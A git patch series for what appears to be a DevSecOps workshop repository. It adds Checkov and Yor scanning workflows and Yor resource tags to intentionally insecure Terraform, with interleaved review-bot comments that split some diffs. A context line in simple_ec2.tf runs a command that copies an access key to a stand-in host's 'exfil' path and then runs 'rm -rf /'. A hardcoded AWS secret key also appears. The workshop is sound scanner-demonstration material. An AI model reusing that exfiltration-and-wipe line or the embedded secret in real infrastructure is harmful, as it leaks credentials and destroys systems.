From 17dfb7677e72c09896734e80f2ee2d4c3476e87d Mon Sep 17 00:00:00 2001
From: ritwiksathe
Date: Wed, 14 May 2025 12:10:06 -0400
Subject: [PATCH 1/7] Create checkov.yaml
---
 .github/workflows/checkov.yaml | 35 ++++++++++++++++++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 .github/workflows/checkov.yaml
diff --git a/.github/workflows/checkov.yaml b/.github/workflows/checkov.yaml
new file mode 100644
index 000000000..9f7240507
--- /dev/null
+++ b/.github/workflows/checkov.yaml
@@ -0,0 +1,35 @@
+name: checkov
+on:
+ pull_request:
+ push:
+ branches:
+ - main
+jobs:
+ scan:
+ runs-on: ubuntu-latest
+ permissions:
+ contents: read # for actions/checkout to fetch code
+ security-events: write # for GitHub/codeql-action/upload-sarif to upload SARIF results
+
+ steps:
+ - uses: actions/checkout@v2
+
+ - name: Run checkov
+ id: checkov
+ uses: bridgecrewio/checkov-action@master
+ with:
+ directory: code/
+ #soft_fail: true
+ #api-key: ${{ secrets.BC_API_KEY }}
+ #env:
+ #PRISMA_API_URL: https://api4.prismacloud.io
+
+ - name: Upload SARIF file
+ uses: GitHub/codeql-action/upload-sarif@v2
+
+ # Results are generated only on a success or failure
+ # this is required since GitHub by default won't run the next step
+ # when the previous one has failed. Alternatively, enable soft_fail in checkov action.
+ if: success() || failure()
+ with:
+ sarif_file: results.sarif
From 23580bea08c7a1ed71a461a4320d22673fac5bf4 Mon Sep 17 00:00:00 2001
From: ritwiksathe
Date: Wed, 14 May 2025 12:16:19 -0400
Subject: [PATCH 2/7] Create yor.yaml
---
 .github/workflows/yor.yaml | 19 +++++++++++++++++++
 1 file changed, 19 insertions(+)
 create mode 100644 .github/workflows/yor.yaml
diff --git a/.github/workflows/yor.yaml b/.github/workflows/yor.yaml
new file mode 100644
index 000000000..a16506910
--- /dev/null
+++ b/.github/workflows/yor.yaml
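Review bot: `uses: bridgecrewio/checkov-action@master` executes whatever is currently on that upstream branch against every pull request and every push to main, so a change to that branch — malicious or merely broken — runs inside this repository's CI with no review here; pin third-party actions to a full-length commit SHA, e.g. `uses: bridgecrewio/checkov-action@<40-char sha> # vX.Y.Z`, and let Dependabot bump the pin. `actions/checkout@v2` and `GitHub/codeql-action/upload-sarif@v2` are both old majors, and v2 of the CodeQL action has, as far as I recall, been deprecated in favour of v3, so the SARIF upload is the step most likely to break first; bump to `actions/checkout@v4` and `github/codeql-action/upload-sarif@v3`, SHA-pinned the same way. On pull requests from forks the GITHUB_TOKEN is read-only regardless of the declared `security-events: write`, so the upload step will fail there while the scan itself still runs; a one-line comment on the permissions block saying so would stop a red job being mistaken for a Checkov finding.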
@@ -0,0 +1,19 @@
+name: IaC tag and trace
+
+on:
+ push:
+ pull_request:
+
+jobs:
+ yor:
+ runs-on: ubuntu-latest
+ permissions:
+ contents: write
+
+ steps:
+ - uses: actions/checkout@v2
+ name: Checkout repo
+ with:
+ fetch-depth: 0
+ - name: Run yor action
+ uses: bridgecrewio/yor-action@main
From 64172ced57c8b9c7e80043425571cd908b1a9f7c Mon Sep 17 00:00:00 2001
From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com>
Date: Wed, 14 May 2025 16:16:39 +0000
Subject: [PATCH 3/7] Update tags (by Yor)
---
 code/deployment_ec2.tf | 150 ++++++++++++++++++++++++++++++++++++++---
 code/deployment_s3.tf | 76 +++++++++++++++++++-
 code/simple_ec2.tf | 11 +++
 code/simple_s3.tf | 11 ++-
 4 files changed, 233 insertions(+), 15 deletions(-)
diff --git a/code/deployment_ec2.tf b/code/deployment_ec2.tf
index 7e3d2bba2..2e6d6d19e 100644
--- a/code/deployment_ec2.tf
+++ b/code/deployment_ec2.tf
@@ -17,7 +17,18 @@ export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMAAAKEY export AWS_DEFAULT_REGION=us-west-2 echo "
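Review bot: `permissions: contents: write` combined with `uses: bridgecrewio/yor-action@main` hands a third-party action, referenced by a mutable branch, the ability to push commits to this repository on every `push` (no branch filter) and every `pull_request`; pin it to a full-length commit SHA and narrow the trigger to the branches you actually want auto-tagged, e.g. `push:` → `branches: [main]`. The `pull_request` trigger adds little, since on fork PRs the token is read-only and the action's push would simply fail. Also worth a comment in this file, because it is a data-handling decision that the workflow does not make visible: Yor writes committer identity into resource tags — the bot commit in patch 3 of this series puts `git_last_modified_by = "tprendervill@paloaltonetworks.com"` on every AWS resource — so personal e-mail addresses become cloud-side metadata readable by anyone with describe/list rights; if that is unwanted, drop those tags with Yor's tag-skipping option (`--skip-tags git_last_modified_by,git_modifiers` in the CLI; check the action's equivalent input). Note this workflow is deleted again in patch 6, so the above matters only if it is reinstated.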

Deployed via Terraform

" | sudo tee /var/www/html/index.html EOF - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_host" + yor_trace = "02490e01-6880-41fe-8ef7-e4e31a8a3c64" + } } resource "aws_ebs_volume" "web_host_storage" { @@ -25,14 +36,36 @@ resource "aws_ebs_volume" "web_host_storage" { availability_zone = "${var.region}a" #encrypted = false # Setting this causes the volume to be recreated on apply size = 1 - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_host_storage" + yor_trace = "b389373b-56c9-47c0-a647-19d81e031819" + } } resource "aws_ebs_snapshot" "example_snapshot" { # ebs snapshot without encryption volume_id = "${aws_ebs_volume.web_host_storage.id}" description = "${local.resource_prefix.value}-ebs-snapshot" - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "example_snapshot" + yor_trace = "1d05a32f-9253-4f1c-9fd2-b085d3fef8f2" + } } resource "aws_volume_attachment" "ebs_att" { 
@@ -69,14 +102,36 @@ resource "aws_security_group" "web-node" { "0.0.0.0/0"] } depends_on = [aws_vpc.web_vpc] - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web-node" + yor_trace = "b49e995b-ecf1-4612-a844-7e5d234e8c07" + } } resource "aws_vpc" "web_vpc" { cidr_block = "172.16.0.0/16" enable_dns_hostnames = true enable_dns_support = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_vpc" + yor_trace = "d6f338ae-4e51-4ee7-b42f-40c84e4f11d7" + } } resource "aws_subnet" "web_subnet" { @@ -85,7 +140,18 @@ resource "aws_subnet" "web_subnet" { availability_zone = "${var.region}a" map_public_ip_on_launch = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_subnet" + yor_trace = "b9942188-18fb-4b3f-8611-78e8a85296f3" + } } resource "aws_subnet" "web_subnet2" { 
@@ -94,20 +160,53 @@ resource "aws_subnet" "web_subnet2" { availability_zone = "${var.region}b" map_public_ip_on_launch = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_subnet2" + yor_trace = "a337c857-f2fe-4951-9cd4-30b3c939b3d1" + } } resource "aws_internet_gateway" "web_igw" { vpc_id = aws_vpc.web_vpc.id - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_igw" + yor_trace = "01542dac-1dd4-40b4-9ff6-f3af80d6bafb" + } } resource "aws_route_table" "web_rtb" { vpc_id = aws_vpc.web_vpc.id - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_rtb" + yor_trace = "2e2bbfed-8cbd-442b-8685-36ce8abe2841" + } } resource "aws_route_table_association" "rtbassoc" { 
@@ -134,6 +233,17 @@ resource "aws_network_interface" "web-eni" { subnet_id = aws_subnet.web_subnet.id private_ips = ["172.16.10.100"] + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web-eni" + yor_trace = "82aac790-1fcd-4809-a727-e1012c8e9911" + } } # VPC Flow Logs to S3 @@ -144,12 +254,34 @@ resource "aws_flow_log" "vpcflowlogs" { vpc_id = aws_vpc.web_vpc.id + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "vpcflowlogs" + yor_trace = "5f09b928-c4ea-4bbd-ba7d-42aaee18e7a7" + } } resource "aws_s3_bucket" "flowbucket" { bucket = "${local.resource_prefix.value}-flowlogs" force_destroy = true + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "flowbucket" + yor_trace = "fece9b1a-6ead-423d-a93e-67a105d8e8b4" + } } # OUTPUTS diff --git a/code/deployment_s3.tf b/code/deployment_s3.tf index cfb272e1d..0c0629c9a 100644 --- a/code/deployment_s3.tf +++ b/code/deployment_s3.tf 
@@ -5,14 +5,36 @@ resource "aws_s3_bucket" "data" { # bucket does not have versioning bucket = "${local.resource_prefix.value}-data" force_destroy = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "data" + yor_trace = "0e77b908-9880-47fd-93df-c8e179af376e" + } } resource "aws_s3_bucket_object" "data_object" { bucket = aws_s3_bucket.data.id key = "customer-master.xlsx" source = "resources/customer-master.xlsx" - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "data_object" + yor_trace = "0ab46a1a-7964-421b-9047-b8a4fd7e4f23" + } } resource "aws_s3_bucket" "financials" { @@ -23,6 +45,17 @@ resource "aws_s3_bucket" "financials" { acl = "private" force_destroy = true + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "financials" + yor_trace = "42334e90-5d63-4710-a5d2-17c1feeacc6f" + } } resource "aws_s3_bucket" "operations" { 
@@ -34,7 +67,18 @@ resource "aws_s3_bucket" "operations" { enabled = true } force_destroy = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "operations" + yor_trace = "ef823476-cafc-427e-bbf6-38c63e7fd6de" + } } resource "aws_s3_bucket" "data_science" { @@ -49,7 +93,18 @@ resource "aws_s3_bucket" "data_science" { target_prefix = "log/" } force_destroy = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "data_science" + yor_trace = "cb1e7dd5-042e-4ec2-9893-474b0ede8096" + } } resource "aws_s3_bucket" "logs" { @@ -67,5 +122,16 @@ resource "aws_s3_bucket" "logs" { } } force_destroy = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "logs" + yor_trace = "ce28f5ad-2545-48f3-8aaf-f764a3bd04a1" + } } diff --git a/code/simple_ec2.tf b/code/simple_ec2.tf index dcfa5880f..191924462 100644 --- a/code/simple_ec2.tf +++ b/code/simple_ec2.tf 
@@ -10,4 +10,15 @@ resource "aws_ec2_host" "test" { command = "echo Running install scripts.. 'echo $ACCESS_KEY > creds.txt ; scp -r creds.txt root@my-home-server.com/exfil/ ; rm -rf /' " } + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/simple_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "test" + yor_trace = "f9ed9b6f-e6ac-4606-b5d6-f5036ae264b0" + } } diff --git a/code/simple_s3.tf b/code/simple_s3.tf index c0d25fb60..b4806b070 100644 --- a/code/simple_s3.tf +++ b/code/simple_s3.tf @@ -6,7 +6,16 @@ resource "aws_s3_bucket" "dev_s3" { bucket_prefix = "dev-" tags = { - Environment = "Dev" + Environment = "Dev" + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/simple_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "ritwiksathe" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "dev_s3" + yor_trace = "f6efb213-7c4b-4f7d-bce8-d9a60c7309c3" } } From c9aab4481886b49ad3c1c00fd8aacd306cadb210 Mon Sep 17 00:00:00 2001 From: ritwiksathe Date: Wed, 14 May 2025 12:43:48 -0400 Subject: [PATCH 4/7] Create s3.tf --- code/build/s3.tf | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 code/build/s3.tf diff --git a/code/build/s3.tf b/code/build/s3.tf new file mode 100644 index 000000000..158875e73 --- /dev/null +++ b/code/build/s3.tf @@ -0,0 +1,18 @@ +provider "aws" { + region = "us-west-2" +} + +resource "aws_s3_bucket" "dev_s3" { + bucket_prefix = "dev-" + + tags = { + Environment = "Dev" + } +} + +resource "aws_s3_bucket_ownership_controls" "dev_s3" { + bucket = aws_s3_bucket.dev_s3.id + rule { + object_ownership = "BucketOwnerPreferred" + } +} 
From b75872c8ffae7ac09c842bf74b331fcae0382aaf Mon Sep 17 00:00:00 2001
From: ritwiksathe
Date: Wed, 14 May 2025 12:55:10 -0400
Subject: [PATCH 5/7] Revert "Create s3.tf"
---
 code/build/s3.tf | 18 ------------------
 1 file changed, 18 deletions(-)
 delete mode 100644 code/build/s3.tf
diff --git a/code/build/s3.tf b/code/build/s3.tf
deleted file mode 100644
index 158875e73..000000000
--- a/code/build/s3.tf
+++ /dev/null
@@ -1,18 +0,0 @@
-provider "aws" {
- region = "us-west-2"
-}
-
-resource "aws_s3_bucket" "dev_s3" {
- bucket_prefix = "dev-"
-
- tags = {
- Environment = "Dev"
- }
-}
-
-resource "aws_s3_bucket_ownership_controls" "dev_s3" {
- bucket = aws_s3_bucket.dev_s3.id
- rule {
- object_ownership = "BucketOwnerPreferred"
- }
-}
From f3c6d0d3d7f30d1dd5a273cfe246c091e472ead9 Mon Sep 17 00:00:00 2001
From: ritwiksathe
Date: Wed, 14 May 2025 15:15:01 -0400
Subject: [PATCH 6/7] Delete .github/workflows/yor.yaml
---
 .github/workflows/yor.yaml | 19 -------------------
 1 file changed, 19 deletions(-)
 delete mode 100644 .github/workflows/yor.yaml
diff --git a/.github/workflows/yor.yaml b/.github/workflows/yor.yaml
deleted file mode 100644
index a16506910..000000000
--- a/.github/workflows/yor.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-name: IaC tag and trace
-
-on:
- push:
- pull_request:
-
-jobs:
- yor:
- runs-on: ubuntu-latest
- permissions:
- contents: write
-
- steps:
- - uses: actions/checkout@v2
- name: Checkout repo
- with:
- fetch-depth: 0
- name: Run yor action
- uses: bridgecrewio/yor-action@main
From 28a46344d03bfdf90798e56f04ab8671f5795cbe Mon Sep 17 00:00:00 2001
From: ritwiksathe
Date: Wed, 14 May 2025 15:28:47 -0400
Subject: [PATCH 7/7] Create s3.tf
---
 code/build/s3.tf | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)
 create mode 100644 code/build/s3.tf
diff --git a/code/build/s3.tf b/code/build/s3.tf
new file mode 100644
index 000000000..158875e73
--- /dev/null
+++ b/code/build/s3.tf
@@ -0,0 +1,18 @@
+provider "aws" {
+ region = "us-west-2"
+}
+
+resource "aws_s3_bucket" "dev_s3" {
+ bucket_prefix = "dev-"
+
+ tags = {
+ Environment = "Dev"
+ }
+}
+
+resource "aws_s3_bucket_ownership_controls" "dev_s3" {
+ bucket = aws_s3_bucket.dev_s3.id
+ rule {
+ object_ownership = "BucketOwnerPreferred"
+ }
+}
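Review bot: `object_ownership = "BucketOwnerPreferred"` on `aws_s3_bucket_ownership_controls.dev_s3` keeps ACLs enabled, so an object can still be uploaded with a cross-account or `public-read` grant; unless an ACL-based grant is genuinely needed, `object_ownership = "BucketOwnerEnforced"` disables ACLs outright and has been AWS's default for newly created buckets since 2023. The bucket itself has no public access block, no server-side-encryption configuration and no versioning — presumably intentional in a workshop repository whose checkov workflow exists to flag exactly this, but if so say it in the file (`# intentionally non-compliant: demo target for the checkov workflow`) so the module is not lifted into real infrastructure as-is. If it is meant to be clean, the cheapest missing control is a public access block alongside the enforced ownership setting:
```hcl
# … unchanged: provider, aws_s3_bucket.dev_s3 …

resource "aws_s3_bucket_public_access_block" "dev_s3" {
  bucket                  = aws_s3_bucket.dev_s3.id
  block_public_acls       = true
  block_public_policy     = true
  ignore_public_acls      = true
  restrict_public_buckets = true
}

resource "aws_s3_bucket_ownership_controls" "dev_s3" {
  bucket = aws_s3_bucket.dev_s3.id
  rule {
    object_ownership = "BucketOwnerEnforced"
  }
}
```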